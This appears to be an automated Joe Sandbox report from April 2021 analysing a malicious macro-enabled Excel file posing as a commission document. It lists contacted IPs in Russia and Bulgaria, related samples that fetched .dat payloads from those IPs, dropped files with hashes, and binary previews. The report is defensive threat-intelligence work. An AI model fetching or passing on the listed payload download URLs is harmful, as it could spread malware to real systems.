                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.2F831197-0868-4F34-83EA-326F8C2F8063.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                188.119.112.114
                                                                                                                                                unknownRussian Federation
                                                                                                                                                50673SERVERIUS-ASNLfalse
                                                                                                                                                188.127.230.104
                                                                                                                                                unknownRussian Federation
                                                                                                                                                56694DHUBRUfalse
                                                                                                                                                185.82.219.75
                                                                                                                                                unknownBulgaria
                                                                                                                                                59729ITL-BGfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                Analysis ID:383366
                                                                                                                                                Start date:07.04.2021
                                                                                                                                                Start time:17:34:19
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 5m 34s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Comission_1980420924_03172021.xlsm
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:32
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal64.expl.evad.winXLSM@7/9@0/3
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsm
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.64.90.137, 204.79.197.200, 13.107.21.200, 20.82.210.154, 168.61.161.212, 23.54.113.53, 52.109.76.68, 52.109.12.24, 52.109.76.35, 13.88.21.125, 40.88.32.150, 95.100.54.203, 23.10.249.43, 23.10.249.26, 51.103.5.186, 20.54.26.129, 52.155.217.156
                                                                                                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                188.119.112.114Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44277.8302662037.dat
                                                                                                                                                Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44277.8255408565.dat
                                                                                                                                                $RJJLOFR.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44277.6243106481.dat
                                                                                                                                                $RJJLOFR.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44277.6192599537.dat
                                                                                                                                                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44273.6999931713.dat
                                                                                                                                                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44273.6949118056.dat
                                                                                                                                                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44273.5870003472.dat
                                                                                                                                                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44273.5824083333.dat
                                                                                                                                                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44272.8791306713.dat
                                                                                                                                                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44272.8720229167.dat
                                                                                                                                                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44272.7099361111.dat
                                                                                                                                                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114/44272.7046824074.dat
                                                                                                                                                188.127.230.104Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44277.8302662037.dat
                                                                                                                                                Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44277.8255408565.dat
                                                                                                                                                $RJJLOFR.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44277.6243106481.dat
                                                                                                                                                $RJJLOFR.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44277.6192599537.dat
                                                                                                                                                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44273.6999931713.dat
                                                                                                                                                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44273.6949118056.dat
                                                                                                                                                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44273.5870003472.dat
                                                                                                                                                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44273.5824083333.dat
                                                                                                                                                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44272.8791306713.dat
                                                                                                                                                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44272.8720229167.dat
                                                                                                                                                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44272.7099361111.dat
                                                                                                                                                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104/44272.7046824074.dat
                                                                                                                                                185.82.219.75Comission_1980420924_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44293.7276049768.dat
                                                                                                                                                Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44277.8302662037.dat
                                                                                                                                                Comission_1109505708_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44277.8255408565.dat
                                                                                                                                                $RJJLOFR.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44277.6243106481.dat
                                                                                                                                                $RJJLOFR.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44277.6192599537.dat
                                                                                                                                                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44273.6999931713.dat
                                                                                                                                                Comission_1510175966_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44273.6949118056.dat
                                                                                                                                                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44273.5870003472.dat
                                                                                                                                                Comission_1851374485_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44273.5824083333.dat
                                                                                                                                                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44272.8791306713.dat
                                                                                                                                                Comission_1137322368_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44272.8720229167.dat
                                                                                                                                                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44272.7099361111.dat
                                                                                                                                                Comission_917519487_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75/44272.7046824074.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                ITL-BGComission_1980420924_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.75
                                                                                                                                                yosgu.dllGet hashmaliciousBrowse
                                                                                                                                                • 185.82.216.191
                                                                                                                                                dent.exeGet hashmaliciousBrowse
                                                                                                                                                • 176.103.62.217
                                                                                                                                                DEBT_1968116513_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.219
                                                                                                                                                DEBT_1968116513_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.219
                                                                                                                                                rcnnLMxlXr.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.249
                                                                                                                                                rcnnLMxlXr.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.249
                                                                                                                                                DEBT_1149018870_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.220
                                                                                                                                                DEBT_1149018870_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.220
                                                                                                                                                61393819618_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.222
                                                                                                                                                61393819618_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.222
                                                                                                                                                DEBT_606324840_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.219
                                                                                                                                                DEBT_606324840_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.219
                                                                                                                                                82085123319_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.225
                                                                                                                                                82085123319_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.225
                                                                                                                                                6337820192_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.222
                                                                                                                                                6337820192_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.222
                                                                                                                                                DEBT_2016336968_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.220
                                                                                                                                                DEBT_2016336968_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.220
                                                                                                                                                6337820192_03192021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 185.82.219.222
                                                                                                                                                SERVERIUS-ASNLComission_1980420924_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.119.112.114
                                                                                                                                                RFQ610016934.exeGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.200
                                                                                                                                                Proforma Invoice for payment URGENTLY.exeGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.200
                                                                                                                                                yuVhCk9sE9.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.77
                                                                                                                                                Ar25M0UwOR.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                yOrAsxt8Qv.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.45968072.21801.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware1.20068.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware1.5648.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                tYSf9q5AiJ.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                messg.jpg.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.54.129
                                                                                                                                                3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                cessentl1.dllGet hashmaliciousBrowse
                                                                                                                                                • 45.67.228.186
                                                                                                                                                figure.03.23.2021.docGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.170
                                                                                                                                                figure.03.23.2021.docGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.170
                                                                                                                                                figure.03.23.2021.docGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.170
                                                                                                                                                documenti-03.23.2021.docGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.170
                                                                                                                                                documenti-03.23.2021.docGet hashmaliciousBrowse
                                                                                                                                                • 188.119.113.170
                                                                                                                                                kOe2Vpp8gk.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                q9ovrPJ48M.exeGet hashmaliciousBrowse
                                                                                                                                                • 193.38.55.33
                                                                                                                                                DHUBRUComission_1980420924_03172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.230.104
                                                                                                                                                61444453825_03222021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.224.35
                                                                                                                                                61444453825_03222021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.224.35
                                                                                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.249.217
                                                                                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.249.217
                                                                                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.249.217
                                                                                                                                                DEBT_1968116513_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.231.55
                                                                                                                                                DEBT_1968116513_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.231.55
                                                                                                                                                DEBT_1149018870_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.231.180
                                                                                                                                                DEBT_1149018870_03182021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.231.180
                                                                                                                                                Claim50770662203292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim206141819403292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim50770662203292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim206141819403292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim50770662203292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim206141819403292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim92563680703292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim170826527103292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim113481509103292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159
                                                                                                                                                Claim92563680703292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 188.127.254.159

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2F831197-0868-4F34-83EA-326F8C2F8063
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):133170
                                                                                                                                                Entropy (8bit):5.371003713327457
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:IcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:0VQ9DQW+zTXiJ
                                                                                                                                                MD5:220A5B4689B37ACD926FB9DE32A0CBF9
                                                                                                                                                SHA1:EBB2C0513F5652B895DFBCB83FEFB234C73C3255
                                                                                                                                                SHA-256:27A1CF077F868DA7406B2A3E83F9BA19BA2270330FE170CE292DA8A44B4A6459
                                                                                                                                                SHA-512:11B9D0579F7D4336D91B6251E0DCD94590E6D8FCC8397DF035CC2B315AF04FF803390CA8F1200FB45F6BC37F7D465488851B80E3C1D041810F8D881215C2597E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-07T15:35:11">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4D928BE7.jpeg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1386x1386, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):171553
                                                                                                                                                Entropy (8bit):7.651426384659082
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:RXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBd:RXFYiB3kNBozoR8gOvljFy3ZIOXP
                                                                                                                                                MD5:1BE35F6C74B488050049162605294C82
                                                                                                                                                SHA1:6788B12BD406903C82C3ED6FD46DD8E833612A74
                                                                                                                                                SHA-256:788C88EB21A724887B5258A8170157BD11FE6A78E0C2C71326E194B6BDF12AC9
                                                                                                                                                SHA-512:EC53901E929051B186070127AD6B05F1A8E6D25C8216187285AB07B78534DF12649204C81B0A9059ADBDF95AAA92CC3978B68DE60A0DB170EB5C66F74FC82895
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.............C....................................................................C.......................................................................j.j.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..sM.6...j.M...]....<..U{{.....+.n.V...+.....z...;....C..E.......3/L.r3....J.]...[..z-Y...Zw.Lz..eY.!_7...i.S..W`..c.h..L.8\....h.G..K.n%-.y.m..}..i..i >q..in...@.._.u.^.).m.o.s.J...6.ZI.>zyV..._n.G......
                                                                                                                                                C:\Users\user\AppData\Local\Temp\24B10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):188596
                                                                                                                                                Entropy (8bit):7.659198039745405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:EXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBG:EXFYiB3kNBozoR8gOvljFy3ZIOXE
                                                                                                                                                MD5:3CB31AC4D2B6884355F3413CD9706C0C
                                                                                                                                                SHA1:557394778B0F59644F3AC31CED127E9D084427FD
                                                                                                                                                SHA-256:4F8E46F30FC972D1EFFD66373D67B2198A97F27EA5122FC301A235003B71C93E
                                                                                                                                                SHA-512:B08E996A70AF28CAF6C81CC97BC15AB1496E18D15C9FF29E6C94A7FACD952A564D80BC649DD4805F409E1D2347AF385BBDE1A37CDBB12A891975A2E86549C5ED
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.N.1.}G.?..Z.:.TU(..Z.X.....]7..c ..... .I..eo.s.c{f|...z.....7#V..^i.....;.0.....Z..d./g.e..(.a......({.....Qd...^c..s......q.]...1.d..f...fA.WJ.....L.2...R$...."..l.%(/.-A7."..=@...Q.c....0d|'.......Yt...`p....e.b.....].....X....F....1.......}.O..7.A...kXH0M.BF......v/..0.L..v~...m...s%.....{..M..Ci..X|4M....\O7........~..@.1."..OtR.O........s..........{..........?....]..i.D.N..Bsv...b.i..Z......B.S...n^...........PK..........!..#|.....X.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Comission_1980420924_03172021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:06 2020, mtime=Wed Apr 7 23:35:15 2021, atime=Wed Apr 7 23:35:15 2021, length=188588, window=hide
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):2320
                                                                                                                                                Entropy (8bit):4.709925838350267
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8jVnYikOsoNKDOsDB6pjVnYikOsoNKDOsDB6:8jEhnDKjEhnD
                                                                                                                                                MD5:82A41CF83DD178B8132F71A0858CB7DD
                                                                                                                                                SHA1:014DE2D51899CED3FF3CA73D641EF5652AF77F55
                                                                                                                                                SHA-256:81347CA0711EF2AE7DF74EED6E2B02588CA2D57014946A9A4BB88E75AF11ACDF
                                                                                                                                                SHA-512:2B78F0C81B80C417F3FD9DC770DF8AAFB39621F063453264C957AB76BAFFF5433586F28E28FC75508ECC7F41CD4FC71914D861FF5ECB65142AC24D5C1E690789
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ....f..8...[}...,..[}...,...............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R[.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R[......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R[......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.l....Rc. .COMISS~1.XLS..v......>Q.u.Rc.....f.....................C.n.C.o.m.i.s.s.i.o.n._.1.9.8.0.4.2.0.9.2.4._.0.3.1.7.2.0.2.1...x.l.s.m.......i...............-.......h...........>.S......C:\Users\user\Desktop\Comission_1980420924_03172021.xlsm..9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.i.s.s.i.o.n._.1.9.8.0.4.2.0.9.2.4._.0.3.1.7.2.0.2.1...x.l.s.m.........:..,.LB.)...Aw...`.......X.......965543...........!a..%.H.VZAj...WYt.+........W...!a..%.H.VZAj...WYt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Wed Apr 7 23:35:15 2021, atime=Wed Apr 7 23:35:15 2021, length=12288, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):909
                                                                                                                                                Entropy (8bit):4.688289890798307
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:80JRU9H6CHiESWAGXWLDRwId+W+jA0/y1bDyOLkeGLkeM4t2Y+xIBjKZm:8qenGP29A0KJDyI7aB6m
                                                                                                                                                MD5:46C630B53384F4A3A12B33D4575768B0
                                                                                                                                                SHA1:C5D85CA7229F404E938244B5B4D325E24B4CE7EE
                                                                                                                                                SHA-256:7537EC84DBED2677F91AFEB475FAA4B94458926922806B83514D7032D370C6A9
                                                                                                                                                SHA-512:96FFC7BA83ABF7AC7EBD3F95F5016459DD71CD1A0E1F992E61F0A5D7B41CB900F14C63F9C6B4DDA5EF9C814442C2FC16420D71C2FE7BF13480CBDEF36766933D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F............-..0V...,..0V...,...0......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R[.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R[......S........................a.l.f.o.n.s.....~.1......Rh...Desktop.h.......NM..Rh......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......965543...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):142
                                                                                                                                                Entropy (8bit):4.567615869533502
